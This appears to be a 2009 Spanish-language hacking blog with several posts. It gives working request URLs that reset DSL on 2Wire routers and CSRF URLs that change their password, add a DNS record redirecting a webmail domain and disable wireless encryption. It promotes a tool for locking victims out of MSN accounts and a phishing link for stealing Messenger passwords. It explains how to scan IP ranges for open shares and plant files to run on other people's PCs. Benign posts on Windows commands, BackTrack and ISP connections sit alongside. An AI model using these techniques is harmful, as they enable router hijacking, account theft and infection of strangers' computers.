inquiet0-r3kcah

Dsl-DoS

2009-03-10T21:58:00.000-07:00

La conexion DSL de los ruteadores 2wire se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z. Ejemplo:

http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
etc...

Modelos Vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway

 Software: v3.17.5, 3.7.1, 4.25.19, 5.29.51

Vulnerabilidades en ruteadores 2Wire (algunas versiones)

2009-03-04T22:15:00.000-08:00

Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway

Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida

http://www.2wire.com fue Notificado



I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.


II. Vulnerabilidad
----------------

Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.

No valida POST ni Referer ni nada.


III. "Exploit"
--------

Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.


[ejemplos]

Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS

Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99

Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0

Toda Internet En Peligro

2009-02-18T22:09:00.000-08:00

Alerta ------->>>>>

Toda internet en peligro, esto no es un juego, ultimamente la gente ya utiliza mas lo que es internet y gracias ha esto ha ido avanzando de un paso muy grande lo que es la inseguridad en los sistemas.

En un principo cuando empezavan los Exploits, Bugs, Errores en Sistemas etc .... etc solo afectavan directamente a sistemas Windows X.x..x.x.x..x en la actualidad ya no existe eso,,, bien es como si ubiera una falta de respeto asi algunos S.O. como lo son Linux, MacOS, Solaris etctct..

Y todo esto a quien se debe ????

bien se debe a que todos nos hemos acostubrado a internet.....

y como jala internet o que es ????

Internet es la red de REDES donde se encuentran conectadas un sin fin numero de ordenadores o PC's ,,,

Internet para que funcione Se necesita diferentes tipos de dispocitivos y protocolos .... que funcionan atraves de puertos..

En algunos dispositovos de red existen Bugs, Exploits etc.

Hoy en dia esta de moda phishing para sacar cuentas de Bancos de correos etc....

Phishing son paginas falsas..

Existen tecnicas de todo tipo para extraer informacion de la red ,///// Que medio (cables, inalambrica).

Spoofing, Sniffer, Phishing, Exploit etc.

Phishing
es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea[1] o incluso utilizando también llamadas telefónicas.

Phishing
En informática, un packet sniffer es un programa de captura de las tramas de red. Generalmente se usa para gestionar la red con una finalidad docente, aunque también puede ser utilizado con fines maliciosos.

Exploit
Exploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, un fragmento de datos, o una secuencia de comandos que se aprovecha de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o algo electrónico (por lo general computarizado). Con frecuencia, esto incluye cosas tales como la violenta toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio..

Como se da la Comunicacion -I-NFINITU-M-

2009-02-08T12:58:00.000-08:00

El sistema por el cual nos conectamos aquellos que tenemos --I-N-F-I-N-I-T-U-M-- es un proceso muy sencillo:

vamos a dar una breve explicacion de como es el proceso de conexion para salir a internet....

en este caso escribo T-e-l-m-e-x e --I-N-F-I-N-I-T-U-M-- asi por aquello de politicas de empresa y para no tener problemas y no aparesca en google directamente o y en especial por los cops

T-e-l-m-e-x nos ofrece un modem --- ok este puede ser de diferente marca o empresa ....

existen:

-2wire (diferentes modelos)
-SpeedStream
-Thomson
-y el mas nuevo el porta retrato HUAWEI

cada uno de estos es los q nos ayudan a conectarnos a internet..... sin mas rodeos aqui un proceso de como se lleva a cabo la conexion..

PC-->MODEM-->MICRO/FILTRO-->ROCETA/TELEFONICA-->DSLAM-->ATM-->SERVIDORES/RADIUS//AAA-PUERTOS 25-587 PARA CORREOS-->ROUTER-->SERVIDORES/DNS-->ROUTER--> NUVE INTERNET

aqui cabe destacar algo muy importante como funcionan cada uno de los aparatos que se acaban de mensionar, no voy a entrar en mucha explicacion asi rapido y sencillo..

DSLAM:

Es un multiplexor localizado en la central telefónica que proporciona a los abonados acceso a los servicios DSL sobre cable de par trenzado de cobre.El dispositivo separa la voz y los datos de las líneas de abonado.

ATM:

Esta definicion que doy aqui no es la qu edefine exactamente el ATM pero en el caso de i-nfinutu-m es la que nos proporsiona los canales de comunicacion y la que nos asigna las velosidades de subida y la de entrada para el caso de i-nfinutu-m no da dos canales para el VPI y VCI los cules son // VPI:8 VCI:81 // VPI:8 VCI:35

SERVIDORES RADIUS

Estos servidores son los que autentifican el ususrio y el password sean correctos para utilizar la linea como acceso a internet, bueno en los modems 2wire modelos 2000 para arriba ya vienen preconfigurado para navegar en internet.. sin poner o configurar el usuario y la contrasena en el modem..

Nota: la contrasena para accesar a internet mediante un modem no es lo mismo que la WebKEY que es para accesar al modem.

SERVIDORES DE DNS:

Etos servodores son los que contienen toda la informacion sobre las ips y nombres de los host

nuestra ultima parada es --------------------------------------->>>>>>>>>>>>

NUVE DE INTERNET

emuladores de los portales de los Modems

By Mr.Anonimo

Chau MSN v1.0 OPEN SOURCE 14

2009-02-07T22:09:00.000-08:00

Chau MSN es un programa creado por arhack, basado en el source de kizar, lo que hace es bloquear cuentas de msn completamente mientras el programa este activo.

Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:

Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.

Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.

ACTUALIZADO 16/04/08

Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.

Les dejo una captura del VB

Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)

Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)

BackTrack

2009-02-03T21:58:00.000-08:00

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general.

Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.

WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.

Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org

Puede encontrarse más información en la página de Backtrack, desde donde también es posible descargarla.

Entre las muchas herramientas del backtrack, quiero resaltar el excelente soporte a tarjetas de red wireless, también tiene incluidas las herramientas para análisis de redes wireless más populares, como Kismet, Air crack, Airsnort entre otras, de hecho, la principal razón por la que me intereso el backtrack en primer lugar, fue por la posibilidad de ejecutar Wireshark, para análisis de redes wireless, ya que el soporte para estos análisis es mucho mejor en Linux y hasta el momento no me ha defraudado, lo he utilizado en un par de veces para estos propósitos con análisis sencillos sin problemas.

Modems T--e-l-m-e-x

2009-02-03T21:10:00.001-08:00

En mexico existen varios proveedores de servicio de internet entre ellos uno muy fuerte y competente es T--e-l-m-e-x entre sus competencias existe:

-Maxcom
-Cablecom
etc. etc (Axtel)

Algo muy importante que cabe destacar en T--e-l-m-e-x son sus diferentes modems que han existido e implementado como lo son:

-SpeedStream
-2wire

--Thomson

--Huawei

Noticia: Recien salidito tambien llega el Huawei que ademas de ser router y bridge es porta Retratos.

proximamente Como configurarlos

SoftPerfect Network Scanner

2009-02-03T21:00:00.001-08:00

SoftPerfect Network Scanner es un programa que facilita el ingreso mediante netbios a otras pcs.
"Primero que nada Netbios significa Network Basic Input Output system (Sistema basico de red de entrada y salida), esto no es considerado un bug, ni un backdoor ni nada asi q yo no lo considero reto, y por lo tanto no lo considero hacking"
Generalmente son pcs de personas que comparten algunos de sus archivos no importantes como musica o imagenes. Pero en muchos de los casos se encuentran pcs que estan compartiendo todos sus discos (grave error).
Aunque no se puede ejecutar archivos con este metodo se puede colar un "archivo" en la carpeta C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio, asi cuando se reinicie la pc se ejecutara ese "archivo".
Otro metodo consite en infectar o reemplazar archivos que se utilizen mucho en esa pc, como por ejemplo el msno el IE, asi cada vez que la victima haga click en el msn o el IE se ejecute nuestro "archivo".
Su uso es muy simple, primero seleccionamos un rango de ips, yo seleccione un rango grande desde 190.30.0.0 hasta 190.31.0.0 (son pcs de arnet, de argentina), despues hacemos click en "Start Scanning".. y empezaran a salir todas las pcs que esten conectadas a internet.
La mayoria de estas pcs no estaran compartiendo archivos, las que si lo esten tienen que tener un [>]o un [+] a la izquierda de la imagen de su pc.
Entonces cuando queremos ver que archivos comparte una pc hacemos click en esa pestañita y saldran las carpetas. Para ver que contiene cada carpeta hacemos click en la misma y apareceran todos sus archivos y subcarpetas, vale aclarar que se puede descargar, subir y ejecutar archivos en nuestra pc.

Descarga: SoftPerfect Network Scanner 3.8 (pagina oficial)
Manual: SoftPerfect Network Scanner Online Manual
Pagina oficial: www.softperfect.com

Lanzador Quien te admitio

2009-02-02T15:24:00.001-08:00

Aqui una ves mas un lanzador para la raza--

quien me admitio al messenger jajaja ok aqui lo dejamos

HTTP://Qui en te ad mitio

Como Funciona:

En el enlace encontraremos un menu

--index

--Buscar correo

ps bueno como todo con mucho ingenio enviaremos a una victima el enlace
que nos aparece en index y le enviamos un buen choro por messenger o correo

cuando pensemos q ya callo nuestra victima nos dirigimos a la parte

--Buscar correo

y buscamos el correo

y listo nos da la contrasena

diviertanse

jajajaj su amigo Anonimo

Comandos Basicos de Windows

2009-02-02T12:24:00.000-08:00

Aqui algunos comandos mas utilizados para windows 2000, xp , millenium, vista

access.cpl : Para Accesibilidad y controles.

wuaucpl.cpl : Para las actualizaciones automÃ¡ticas.

compmgmt.msc : Para la administraciÃ³n de equipos

devmgmt.msc : Para la administraciÃ³n del dispositivos

taskmgr : Para el administrador de tareas

control admintools : Las Herramientas administrativas

magnify : El ampliador de Windows osea la lupa.

hdwwiz.cpl : Asistente para aÃ±adir hardware

appwiz.cpl : Para Instalar/desinstalar programas

shutdown : Para apagar Windows

mmsys.cpl : Para el audio y sonido

ac3filter.cpl : Para audio, abrir el AC3 Filter (Si estÃ¡ instalado. Es una especie de ecualizador de audio)

notepad : Para el Bloc de notas

fsquirt : Para el Bluetooth (Asistente de transferencia)

findfast.cpl : Para la bÃºsqueda rÃ¡pida

eudcedit : Para caracteres privados, Editor

calc : Para la calculadora

control folders : Para opciones de la carpeta

certmgr.msc : Certificados (gestiÃ³n)

charmap : Caracteres (Mapa)

fsmgmt.msc : Para ver Carpetas compartidas

chkdsk : Check Disk Utility (ComprobaciÃ³n del Disco Duro)

clipbrd : Clipboard Viewer (Para visualizar el portapapeles)

cmd : Command Prompt (Pantalla de comandos, como el antiguo MsDos)

dcomcnfg : Componentes, servicios

sigverif : ComprobaciÃ³n de la firma del archivo

verifier : Controladores (drivers), administrador del comprobador de...

timedate.cpl : Fecha y hora, propiedades

ddeshare : Recursos compartidos DDE

dxdiag : Direct X, diagnÃ³stico de problemas

directx.cpl : DirectX, panel de control (Si estÃ¡ instalado)

diskmgmt.msc : Para la Administraciob de discos

diskpart : Administrador de particiones de disco

dfrg.msc : Desfragmentador del disco

cleanmgr : Liberador de espacio del disco

drwtsn32 : Dr. Watson (utilidad de diagnÃ³stico del sistema)

powercfg.cpl : opciones y configuraciÃ³n de la EnergÃa

sticpl.cpl : EscÃ¡neres y CÃ¡maras

mstsc : Escritorio remoto

control fonts :Fuentes

fonts : Fuentes, carpeta dÃ³nde estÃ¡n instaladas las fuentes.

gpedit.msc : Group Policy Editor (sÃ³lo en XP profesional)

iexpress : Iexpress Wizard

printers : Carpetas de impresoras

control printers : Impresoras y Faxes

ciadv.msc : Index Server, servicio

inetcpl.cpl : Internet, propiedades

ipconfig /all : IP ConfiguraciÃ³n (Muestra la configuraciÃ³n de las conexiones)

ipconfig /displaydns : IP ConfiguraciÃ³n (Muestra la cachÃ© de resoluciÃ³n de DNS - recomendable mirar todo lo que hay)

ipconfig /flushdns : IP ConfiguraciÃ³n (Borra las DNS Cache Contents)

ipconfig /release : IP ConfiguraciÃ³n (Lanza todas las conexiones)

ipconfig /renew : IP ConfiguraciÃ³n (Renueva todas las conexiones)

ipconfig /registerdns : IP ConfiguraciÃ³n (Refresca DHCP & Re-Registra DNS)

ipconfig /showclassid : IP ConfiguraciÃ³n (Muestra DHCP Class ID)

ipconfig /setclassid : IP ConfiguraciÃ³n (Modifica DHCP Class ID)

jpicpl32.cpl : Java, Panel de control (Si estÃ¡ instalado)

winmine : Juego de buscaminas

freecell : Juego de carta blanca

mshearts : Juego de corazones

sol : Juego de solitario

spider : Juego de spider

joy.cpl : Controladores de Juegos

ntmsmgr.msc : Medios de almacenamiento extraÃbles

ntmsoprq.msc : Medios de almacenamiento extraÃbles, solicitudes del operador

winchat : Microsoft Chat

control mouse : Propiedades del RatÃ³n

control netconnections : Conexiones de Red

netsetup.cpl : Asistente para la configuracion de Red

nvtuicpl.cpl : Nview Desktop Manager (Si estÃ¡ instalado. Son unos controladores de nVidia)

packager : Empaquetador de Objectos

odbccp32.cpl : ODBC Data Source Administrator

osk : Teclado en pantalla (Ãºtil si se te estropea el teclado)

control desktop :Propiedades de la Pantalla

control color : Si se quiere que aparezca la pestaÃ±a de control de colores

password.cpl : Propiedades de las Password

intl.cpl : ConfiguraciÃ³n Regional

regedit : Editor de Registro

perfmon.msc : Rendimiento del sistema, monitor

rsop.msc : Resultant Set of Policy (XP Profesional)

logoff : Salir de Windows (para cambiar de usuario)

wscui.cpl : Security Center

secpol.msc : Seguridad, configuraciÃ³n local

services.msc : Servicios

sysedit : Editor de configuraciÃ³n del Sistema

sysdm.cpl : Propiedades del Sistema

msconfig : Utilidad de configuraciÃ³n del Sistema

sfc /scannow : Utilidad de comprobaciÃ³n de archivos del Sistema (Escanea inmediatamente)

sfc /scanonce : Utilidad de comprobaciÃ³n de archivos del Sistema (Escanea una vez en el siguiente encendido)

sfc /scanboot : Utilidad de comprobaciÃ³n de archivos del Sistema (Escanea en cada encendido)

sfc /revert : Utilidad de comprobaciÃ³n de archivos del Sistema (Vuelve a la configuraciÃ³n por defecto)

sfc /purgecache : Utilidad de comprobaciÃ³n de archivos del Sistema (Purga el archivo cachÃ©)

sfc /cachesize=x : Utilidad de comprobaciÃ³n de archivos del Sistema (Configura el archivo cachÃ© a la talla x)

cliconfg : ConfiguraciÃ³n de SQL

eventvwr.msc : Visor de Sucesos

tasklist : Lista de tareas (XP profesional)

taskkill /PID : Terminar tarea (XP profesional)

control schedtasks : Tareas programadas

control keyboard : Propiedades del teclado

telephon.cpl : Ppciones de telÃ©fono y modem

telnet : Cliente Telnet

nusrmgr.cpl : Administrador de cuenta usuario

control userpasswords2 : Administrador de cuentas de Usuarios

control userpasswords : Cuentas de usuarios

lusrmgr.msc : Usuarios locales y grupos

utilman : Utilidades, administrador

firewall.cpl : Firewall de Windows

wmimgmt.msc : Windows Management Infrastructure

syskey : Windows System Security Tool

wupdmgr : Windows Update

tourstart : Paseo por Windows XP

write : Para abrir Wordpad